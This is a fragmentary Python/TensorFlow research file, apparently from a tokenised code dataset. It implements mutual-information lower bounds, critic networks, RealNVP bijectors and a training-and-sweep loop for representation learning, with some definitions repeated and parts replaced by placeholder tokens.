input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\ndef real_nvp_default_template(hidden_layers, shift_only=False, activation=\n tf.nn.relu, name=None, *args, **kwargs):\n with tf.compat.v1.name_scope(name or 'real_nvp_default_template'):\n\n def _fn(x, output_units, **condition_kwargs):\n \"\"\"Fully connected MLP parameterized via `real_nvp_template`.\"\"\"\n if 
condition_kwargs:\n raise NotImplementedError(\n 'Conditioning not implemented in the default template.')\n if tensorshape_util.rank(x.shape) == 1:\n x = x[tf.newaxis, ...]\n reshape_output = lambda x: x[0]\n else:\n reshape_output = lambda x: x\n for units in hidden_layers:\n x = tf1.layers.dense(*args, inputs=x, units=units,\n activation=activation, **kwargs)\n x = tf1.layers.dense(*args, inputs=x, units=(1 if shift_only else\n 2) * output_units, activation=None, **kwargs)\n if shift_only:\n return reshape_output(x), None\n shift, log_scale = tf.split(x, 2, axis=-1)\n return reshape_output(shift), 1e-07 + tf.nn.softplus(reshape_output\n (log_scale))\n return tf1.make_template('real_nvp_default_template', _fn)\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\ndef train(g1, g2, critic, loss_fn, learning_rate, batch_size=\n TRAIN_BATCH_SIZE, n_iters=15000, n_evals=15, compute_jacobian=False,\n noise_std=0.0, data_dimensions=DIMS // 2, n_iter=1, loss_name='InfoNCE'):\n \"\"\"Runs the training loop for a fixed model.\n\n Args:\n g1: Function, maps input1 to representation.\n g2: Function, maps input2 to representation.\n critic: Function, maps two representations to scalar.\n loss_fn: Function, mutual information estimator.\n learning_rate: Learning rate.\n batch_size: Training batch size.\n n_iters: Number of optimization iterations.\n n_evals: Number of model evaluations.\n compute_jacobian: Whether to estimate the singular values of the Jacobian.\n noise_std: Standard 
deviation for the Gaussian noise. Default is 0.0.\n data_dimensions: The dimension of the data. By default it's half of the\n original data dimension.\n Returns:\n Returns and instance of `Results` tuple.\n \"\"\"\n x_1, x_2, _ = processed_train_data(data_dimensions, batch_size)\n if noise_std > 0.0:\n assert x_1.shape == x_2.shape, 'X1 and X2 shapes must agree to add noise!'\n noise = noise_std * tf.random.normal(x_1.shape)\n x_1 += noise\n x_2 += noise\n code_1, code_2 = g1(x_1), g2(x_2)\n critic_matrix = critic(code_1, code_2)\n if compute_jacobian:\n jacobian = gradients.batch_jacobian(code_1, x_1, use_pfor=False)\n singular_values = tf.linalg.svd(jacobian, compute_uv=False)\n loss = loss_fn(critic_matrix)\n optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=learning_rate)\n if not loss_name == 'wpc':\n optimizer_op = optimizer.minimize(loss)\n else:\n gvs = optimizer.compute_gradients(loss)\n capped_gvs = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad,\n var in gvs]\n optimizer_op = optimizer.apply_gradients(capped_gvs)\n with tf.compat.v1.Session() as session:\n session.run(tf.compat.v1.global_variables_initializer())\n data_ph = tf.compat.v1.placeholder(tf.float32, shape=[None,\n data_dimensions])\n data_ph_noisy = data_ph + noise_std * tf.random.normal(tf.shape(\n input=data_ph))\n codes = g1(data_ph_noisy)\n (training_losses, testing_losses, classification_accuracies, iters,\n sigmas) = [], [], [], [], []\n for iter_n in range(n_iters):\n if iter_n % (n_iters // n_evals) == 0:\n iters.append(iter_n)\n accuracy = get_classification_accuracy(session, codes,\n data_ph, data_dimensions)\n classification_accuracies.append(accuracy)\n testing_losses.append(get_testing_loss(x_test, session,\n loss, data_ph, data_dimensions))\n if compute_jacobian:\n sigmas.append(session.run(singular_values))\n print(\n '{:d}th iter Loss_name {} Step {:>10d} fit {:>.5f} DS {} B {:d} lr {:f}'\n .format(n_iter, loss_name, iter_n, accuracy, args.\n dataset, args.batch_size, args.lr))\n loss_np, _ = session.run([loss, optimizer_op])\n training_losses.append(loss_np)\n return Results(iterations=iters, training_losses=training_losses,\n testing_losses=testing_losses, classification_accuracies=\n classification_accuracies, singular_values=sigmas)\n\n\ndef run_sweep(nets, critics, loss_fns, exp_name, **kwargs):\n \"\"\"Runs the sweep across encoder networks, critics, and the estimators.\"\"\"\n grid = itertools.product(nets, critics, loss_fns)\n data_frames = []\n results_with_singular_values = []\n for nets_name, critic_name, loss_name in grid:\n print('[New experiment] encoder: {}, critic: {}, loss: {}'.format(\n nets_name, critic_name, loss_name))\n with tf.Graph().as_default():\n g1, g2 = nets[nets_name]()\n critic = critics[critic_name]()\n loss_fn = loss_fns[loss_name]\n results_per_run = []\n for n in range(NRUNS):\n try:\n print('{:d}th run, loss: {}'.format(n, loss_name))\n if loss_name == 'drfc' and TFDS_NAME == 'cifar10':\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n else:\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n results_per_run.append(results)\n except Exception as ex:\n print('Run {} failed! 
Error: {}'.format(n, ex))\n for i, result in enumerate(results_per_run):\n data_frames.append(convert_to_data_frame(result, exp_name,\n nets_name, critic_name, loss_name, i))\n if kwargs.get('compute_jacobian', False):\n results_with_singular_values.append((ResultsConfig(\n nets_name, critic_name, loss_name), results_per_run))\n return {'df': pd.concat(data_frames), 'singular_values':\n results_with_singular_values}\n\n\n<function token>\n<code token>\n",
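In train() above, the 'wpc' estimator bypasses optimizer.minimize and instead clips every gradient to [-1, 1] before apply_gradients. The toy TF1-style snippet below isolates that clipping pattern on a made-up quadratic loss; it illustrates only the mechanism, not the experiment itself.

import tensorflow.compat.v1 as tf1
tf1.disable_eager_execution()

w = tf1.get_variable('w', shape=[2], initializer=tf1.zeros_initializer())
loss = tf1.reduce_sum(tf1.square(w - [3.0, -3.0]))   # placeholder quadratic objective
opt = tf1.train.AdamOptimizer(learning_rate=0.1)
gvs = opt.compute_gradients(loss)
capped_gvs = [(tf1.clip_by_value(g, -1.0, 1.0), v) for g, v in gvs]
train_op = opt.apply_gradients(capped_gvs)           # same clip-then-apply pattern as the 'wpc' branch

with tf1.Session() as sess:
    sess.run(tf1.global_variables_initializer())
    for _ in range(5):
        print(sess.run([loss, train_op])[0])         # loss decreases under clipped updates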
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n\n\ndef convert_to_data_frame(result, exp_name, nets, critic, loss, seed):\n \"\"\"Convert results class to a data frame.\"\"\"\n label = '{}, {}, {}'.format(nets, critic, loss)\n rows = list(zip(itertools.repeat(exp_name), itertools.repeat(nets),\n itertools.repeat(critic), itertools.repeat(loss), itertools.repeat(\n seed), result.iterations, [(-loss) for loss in result.\n testing_losses], result.classification_accuracies, itertools.repeat\n (label)))\n df_eval = pd.DataFrame(rows, columns=('exp_name', 'nets', 'Critic',\n 'Estimator', 'run', 'iteration', 'bound_value', 'accuracy', 'label'))\n df_eval['Estimator'] = df_eval['Estimator'].replace(to_replace={'cpc':\n '$CPC$', 'pcc': '$PCC$', 'drfc': '$D-RFC$', 'wpc': '$WPC$'})\n df_eval['Critic'] = df_eval['Critic'].replace(to_replace={'concat':\n 'MLP', 'separable': 'Separable', 'innerprod': 'Inner product',\n 'bilinear': 'Bilinear'})\n return df_eval\n\n\ndef apply_default_style(ax):\n ax.set_xlim([0, 20001])\n ax.get_xaxis().set_major_formatter(FuncFormatter(lambda x, p: format(\n int(x / 1000), ',')))\n ax.set_xlabel('Training steps (in thousands)')\n plt.tick_params(top=False, right=False, bottom=False, left=False)\n handles, labels = ax.get_legend_handles_labels()\n plt.legend(loc='lower right', handles=handles[1:], labels=labels[1:])\n\n\ndef get_testing_loss(x_array, session, loss, data_ph, dims, batch_size=512):\n total_loss = 0\n for i in range(0, x_array.shape[0], batch_size):\n x_slice = x_array[i:i + batch_size, :dims]\n total_loss += x_slice.shape[0] * session.run(loss, feed_dict={\n data_ph: x_slice})\n return total_loss / x_array.shape[0]\n\n\ndef get_classification_accuracy(session, codes, data_ph, dims):\n x_train_mapped = map_data(x_train, session, codes, data_ph, dims)\n x_test_mapped = map_data(x_test, session, codes, data_ph, dims)\n accuracy = logistic_fit(x_train_mapped, y_train, x_test_mapped, y_test)\n return accuracy\n\n\n<function token>\n<function token>\n\n\ndef tuba_lower_bound(scores, log_baseline=None):\n if log_baseline is not None:\n scores -= log_baseline[:, None]\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n marg_term = tf.exp(reduce_logmeanexp_nodiag(scores))\n return 1.0 + joint_term - marg_term\n\n\n<function token>\n\n\[email protected]\ndef js_fgan_lower_bound(f):\n \"\"\"Lower bound on Jensen-Shannon divergence from Nowozin et al. (2016).\"\"\"\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n n = tf.cast(f.shape[0], tf.float32)\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return first_term - second_term\n\n\[email protected]\ndef infonce_lower_bound(scores):\n \"\"\"InfoNCE lower bound from van den Oord et al. 
(2018).\"\"\"\n nll = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores) - tf.\n reduce_logsumexp(input_tensor=scores, axis=1))\n mi = tf.math.log(tf.cast(scores.shape[0], tf.float32)) + nll\n return mi\n\n\[email protected]\ndef our_lower_bound(scores):\n \"\"\"Our lower bound\"\"\"\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n scores_sq = scores ** 2\n marg_num = batch_size * (batch_size - 1.0)\n marg_term = tf.reduce_sum(input_tensor=scores_sq) - tf.reduce_sum(\n input_tensor=tf.linalg.diag_part(scores_sq))\n marg_term = marg_term / marg_num\n return joint_term - 0.5 * marg_term\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(solver='saga',\n multi_class='multinomial', tol=0.1, C=10.0)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n\n<code token>\n\n\ndef map_fn(example):\n image = example[FEATURE_INPUT]\n image = tf.cast(image, tf.float32) / 255.0\n image = tf.reshape(image, [-1])\n label = example[FEATURE_LABEL]\n return {FEATURE_INPUT: image, FEATURE_LABEL: label}\n\n\n<function token>\n\n\ndef tfds_to_np(dataset):\n features = list(tfds.as_numpy(dataset))\n images = np.stack([f[FEATURE_INPUT].ravel() for f in features])\n labels = np.stack([f[FEATURE_LABEL].ravel() for f in features])\n return images, labels\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return 
input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\ndef real_nvp_default_template(hidden_layers, shift_only=False, activation=\n tf.nn.relu, name=None, *args, **kwargs):\n with tf.compat.v1.name_scope(name or 'real_nvp_default_template'):\n\n def _fn(x, output_units, **condition_kwargs):\n \"\"\"Fully connected MLP parameterized via `real_nvp_template`.\"\"\"\n if 
condition_kwargs:\n raise NotImplementedError(\n 'Conditioning not implemented in the default template.')\n if tensorshape_util.rank(x.shape) == 1:\n x = x[tf.newaxis, ...]\n reshape_output = lambda x: x[0]\n else:\n reshape_output = lambda x: x\n for units in hidden_layers:\n x = tf1.layers.dense(*args, inputs=x, units=units,\n activation=activation, **kwargs)\n x = tf1.layers.dense(*args, inputs=x, units=(1 if shift_only else\n 2) * output_units, activation=None, **kwargs)\n if shift_only:\n return reshape_output(x), None\n shift, log_scale = tf.split(x, 2, axis=-1)\n return reshape_output(shift), 1e-07 + tf.nn.softplus(reshape_output\n (log_scale))\n return tf1.make_template('real_nvp_default_template', _fn)\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\ndef train(g1, g2, critic, loss_fn, learning_rate, batch_size=\n TRAIN_BATCH_SIZE, n_iters=15000, n_evals=15, compute_jacobian=False,\n noise_std=0.0, data_dimensions=DIMS // 2, n_iter=1, loss_name='InfoNCE'):\n \"\"\"Runs the training loop for a fixed model.\n\n Args:\n g1: Function, maps input1 to representation.\n g2: Function, maps input2 to representation.\n critic: Function, maps two representations to scalar.\n loss_fn: Function, mutual information estimator.\n learning_rate: Learning rate.\n batch_size: Training batch size.\n n_iters: Number of optimization iterations.\n n_evals: Number of model evaluations.\n compute_jacobian: Whether to estimate the singular values of the Jacobian.\n noise_std: Standard 
deviation for the Gaussian noise. Default is 0.0.\n data_dimensions: The dimension of the data. By default it's half of the\n original data dimension.\n Returns:\n Returns and instance of `Results` tuple.\n \"\"\"\n x_1, x_2, _ = processed_train_data(data_dimensions, batch_size)\n if noise_std > 0.0:\n assert x_1.shape == x_2.shape, 'X1 and X2 shapes must agree to add noise!'\n noise = noise_std * tf.random.normal(x_1.shape)\n x_1 += noise\n x_2 += noise\n code_1, code_2 = g1(x_1), g2(x_2)\n critic_matrix = critic(code_1, code_2)\n if compute_jacobian:\n jacobian = gradients.batch_jacobian(code_1, x_1, use_pfor=False)\n singular_values = tf.linalg.svd(jacobian, compute_uv=False)\n loss = loss_fn(critic_matrix)\n optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=learning_rate)\n if not loss_name == 'wpc':\n optimizer_op = optimizer.minimize(loss)\n else:\n gvs = optimizer.compute_gradients(loss)\n capped_gvs = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad,\n var in gvs]\n optimizer_op = optimizer.apply_gradients(capped_gvs)\n with tf.compat.v1.Session() as session:\n session.run(tf.compat.v1.global_variables_initializer())\n data_ph = tf.compat.v1.placeholder(tf.float32, shape=[None,\n data_dimensions])\n data_ph_noisy = data_ph + noise_std * tf.random.normal(tf.shape(\n input=data_ph))\n codes = g1(data_ph_noisy)\n (training_losses, testing_losses, classification_accuracies, iters,\n sigmas) = [], [], [], [], []\n for iter_n in range(n_iters):\n if iter_n % (n_iters // n_evals) == 0:\n iters.append(iter_n)\n accuracy = get_classification_accuracy(session, codes,\n data_ph, data_dimensions)\n classification_accuracies.append(accuracy)\n testing_losses.append(get_testing_loss(x_test, session,\n loss, data_ph, data_dimensions))\n if compute_jacobian:\n sigmas.append(session.run(singular_values))\n print(\n '{:d}th iter Loss_name {} Step {:>10d} fit {:>.5f} DS {} B {:d} lr {:f}'\n .format(n_iter, loss_name, iter_n, accuracy, args.\n dataset, args.batch_size, args.lr))\n loss_np, _ = session.run([loss, optimizer_op])\n training_losses.append(loss_np)\n return Results(iterations=iters, training_losses=training_losses,\n testing_losses=testing_losses, classification_accuracies=\n classification_accuracies, singular_values=sigmas)\n\n\ndef run_sweep(nets, critics, loss_fns, exp_name, **kwargs):\n \"\"\"Runs the sweep across encoder networks, critics, and the estimators.\"\"\"\n grid = itertools.product(nets, critics, loss_fns)\n data_frames = []\n results_with_singular_values = []\n for nets_name, critic_name, loss_name in grid:\n print('[New experiment] encoder: {}, critic: {}, loss: {}'.format(\n nets_name, critic_name, loss_name))\n with tf.Graph().as_default():\n g1, g2 = nets[nets_name]()\n critic = critics[critic_name]()\n loss_fn = loss_fns[loss_name]\n results_per_run = []\n for n in range(NRUNS):\n try:\n print('{:d}th run, loss: {}'.format(n, loss_name))\n if loss_name == 'drfc' and TFDS_NAME == 'cifar10':\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n else:\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n results_per_run.append(results)\n except Exception as ex:\n print('Run {} failed! 
Error: {}'.format(n, ex))\n for i, result in enumerate(results_per_run):\n data_frames.append(convert_to_data_frame(result, exp_name,\n nets_name, critic_name, loss_name, i))\n if kwargs.get('compute_jacobian', False):\n results_with_singular_values.append((ResultsConfig(\n nets_name, critic_name, loss_name), results_per_run))\n return {'df': pd.concat(data_frames), 'singular_values':\n results_with_singular_values}\n\n\n<function token>\n<code token>\n",
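logistic_fit in the listing scores representations by min-max scaling them and fitting a multinomial logistic regression with the saga solver. The sketch below reproduces that evaluation recipe on synthetic arrays; the random data stands in for encoder codes and labels and is only a placeholder.

import numpy as np
from sklearn.linear_model import LogisticRegression
from sklearn.preprocessing import MinMaxScaler

rng = np.random.default_rng(0)
x_train = rng.normal(size=(500, 100))
y_train = rng.integers(0, 10, size=500)
x_test = rng.normal(size=(200, 100))
y_test = rng.integers(0, 10, size=200)

scaler = MinMaxScaler()                      # same preprocessing as logistic_fit
x_train = scaler.fit_transform(x_train)
x_test = scaler.transform(x_test)

clf = LogisticRegression(solver='saga', multi_class='multinomial', tol=0.1, C=10.0)
clf.fit(x_train, y_train.ravel())
print('test accuracy:', clf.score(x_test, y_test.ravel()))   # chance level on random data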
